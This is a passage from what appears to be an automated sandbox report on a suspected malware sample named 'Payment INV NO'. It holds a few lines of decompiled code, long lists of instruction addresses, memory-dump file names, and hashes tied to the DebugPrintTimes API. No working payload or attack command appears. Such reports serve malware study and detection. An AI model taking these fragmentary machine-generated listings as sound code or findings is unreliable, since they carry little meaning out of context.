							 *0x188b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E017DB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                          0x017c645b
                                                          0x017c6463
                                                          0x017c646d
                                                          0x017c6475
                                                          0x017c647a
                                                          0x017c647e
                                                          0x017c6480
                                                          0x017c648c
                                                          0x017c6490
                                                          0x017c6495
                                                          0x017c6498
                                                          0x017c649b
                                                          0x017c649f
                                                          0x017c64a1
                                                          0x01807c07
                                                          0x01807c09
                                                          0x01807c0c
                                                          0x00000000
                                                          0x017c64a7
                                                          0x017c64a7
                                                          0x017c64aa
                                                          0x01807bf7
                                                          0x01807c00
                                                          0x00000000
                                                          0x01807bf9
                                                          0x01807bf9
                                                          0x01807bf9
                                                          0x017c64b0
                                                          0x017c64b0
                                                          0x017c64b2
                                                          0x017c64b2
                                                          0x017c64b3
                                                          0x017c64ba
                                                          0x017c6553
                                                          0x017c655e
                                                          0x017c6566
                                                          0x017c656c
                                                          0x017c6575
                                                          0x017c657f
                                                          0x017c6585
                                                          0x017c6588
                                                          0x017c6588
                                                          0x017c64c7
                                                          0x017c64cb
                                                          0x017c64ce
                                                          0x017c64d3
                                                          0x017c64da
                                                          0x017c64e5
                                                          0x017c64ed
                                                          0x017c64f1
                                                          0x017c64f5
                                                          0x017c64f6
                                                          0x017c64fa
                                                          0x017c6502
                                                          0x017c6503
                                                          0x017c6504
                                                          0x017c6507
                                                          0x017c651a
                                                          0x017c6524
                                                          0x017c6524
                                                          0x017c6526
                                                          0x017c6526
                                                          0x017c64aa
                                                          0x017c652c
                                                          0x017c652d
                                                          0x017c652e
                                                          0x017c6539

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: 0$0
                                                          • API String ID: 3446177414-203156872
                                                          • Opcode ID: baa967cf3f1dfbdd92d79a107aee55b96c904dcdb753273a70f8905707232ee2
                                                          • Instruction ID: e728b5ff6e6a3af8a7624ea541c53efe5335456d92342fd39717dda70c552817
                                                          • Opcode Fuzzy Hash: baa967cf3f1dfbdd92d79a107aee55b96c904dcdb753273a70f8905707232ee2
                                                          • Instruction Fuzzy Hash: 18415BB16087069FC311CF28C484A5AFBE5BB89714F14466EF988DB341D731EA05CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%